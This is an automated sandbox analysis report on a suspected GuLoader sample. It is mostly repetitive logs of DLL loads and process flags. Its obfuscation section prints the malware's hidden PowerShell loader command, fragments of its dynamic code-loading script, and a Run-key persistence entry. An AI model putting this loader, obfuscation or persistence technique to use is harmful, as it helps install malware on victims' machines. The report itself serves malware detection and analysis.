              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\rPO3799039985.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: rPO3799039985.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbO source: powershell.exe, 00000002.00000002.144017518011.000000000303E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdb{ source: powershell.exe, 00000002.00000002.144031828230.0000000008A68000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000002.00000002.144033904631.00000000094FE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.148889312327.00000000045CE000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Noncontributory $Chocking $Bearnaisesovserne12), (Welshy @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hypoxanthic154 = [AppDomain]::CurrentDomain.GetAss
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Skorpefrie)), $Rewrapt).DefineDynamicModule($Homilist, $false).DefineType($Recleaner, $Atombevbningens, [System.MulticastDelegate])$An
              Suspicious powershell command line found
              Source: C:\Users\user\Desktop\rPO3799039985.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)
              Source: C:\Users\user\Desktop\rPO3799039985.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214D7240 GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,4_2_214D7240
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_03268460 push eax; mov dword ptr [esp], edx2_2_03268474
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_093D11E1 push 8BD68B50h; iretd 2_2_093D11E6
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214DB146 push ecx; ret 4_2_214DB159
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214F343D push esi; ret 4_2_214F3446
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_214F6F69 push esp; iretd 4_2_214F6F6A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_21DE2806 push ecx; ret 4_2_21DE2819
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_21DF1219 push esp; iretd 4_2_21DF121A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044693D push ecx; ret 9_2_0044694D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044DB70 push eax; ret 9_2_0044DB84
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0044DB70 push eax; ret 9_2_0044DBAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00451D54 push eax; ret 9_2_00451D61
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044B090 push eax; ret 10_2_0044B0A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0044B090 push eax; ret 10_2_0044B0CC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00451D34 push eax; ret 10_2_00451D41
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00444E71 push ecx; ret 10_2_00444E81
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00414060 push eax; ret 11_2_00414074
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00414060 push eax; ret 11_2_0041409C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00414039 push ecx; ret 11_2_00414049
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004164EB push 0000006Ah; retf 11_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00416553 push 0000006Ah; retf 11_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00416555 push 0000006Ah; retf 11_2_004165C4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\rPO3799039985.exeJump to dropped file
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BesmearsJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BesmearsJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_004047CB
              Source: C:\Users\user\Desktop\rPO3799039985.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
